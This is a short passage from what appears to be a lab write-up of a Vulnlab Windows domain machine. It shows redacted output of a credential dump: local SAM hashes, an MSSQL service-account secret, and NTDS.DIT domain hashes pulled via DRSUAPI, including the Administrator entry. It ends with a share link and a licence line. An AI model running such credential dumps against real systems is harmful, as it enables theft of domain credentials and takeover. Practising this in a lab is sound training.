[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<SNIP>
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_prod:<REDACTED>
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=73e64769-1783-46dc-a7f3-0fb64989231c

This post is licensed under CC BY 4.0 by the author.